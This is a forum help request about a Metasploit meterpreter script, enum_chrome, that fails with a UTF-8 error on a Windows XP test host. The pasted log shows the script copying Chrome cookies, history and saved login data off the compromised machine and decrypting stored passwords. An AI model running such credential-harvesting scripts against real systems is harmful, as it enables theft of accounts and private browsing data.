Hello guys,

I got argument error when I ran the enum_chrome metepreter srcipt.

The victim OS is MS XP SP3, no fw, no AV. The Chrome version is 7.0.517.41.

I hope, somebody can help me resolve this issue.

Thanks a lot,
tokimtom


The error message:
meterpreter > run enum_chrome[*] using output format(s): json[*] running as user 'TESTXP\Rendszergazda'...[*] extracting data for user 'Rendszergazda'...[*] downloading file Web Data to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda /Web Data'...[*] downloading file Cookies to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda/ Cookies'...[*] downloading file History to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda/ History'...[*] downloading file Login Data to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda/Login Data'...[*] downloading file Bookmarks to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda/Bookmarks'...[*] downloading file Preferences to '/root/.msf3/logs/scripts/enum_chrome/TESTXP/20101108.1648/Rendszergazda/Preferences'...[*] writing output 'autofill'...[*] no 'user_site' data found in file 'Web Data'[*] no 'autofill_profiles' data found in file 'Web Data'[*] no 'autofill_credit_cards' data found in file 'Web Data'[*] writing output 'cookies'...[*] writing output 'url_history'...[*] writing output 'download_history'...[*] no 'search_history' data found in file 'History'
[+] decrypting field 'password_value'...
[+] decrypting field 'password_value'...[*] writing output 'logins'...
[-] Error in script: ArgumentError redundant UTF-8 sequence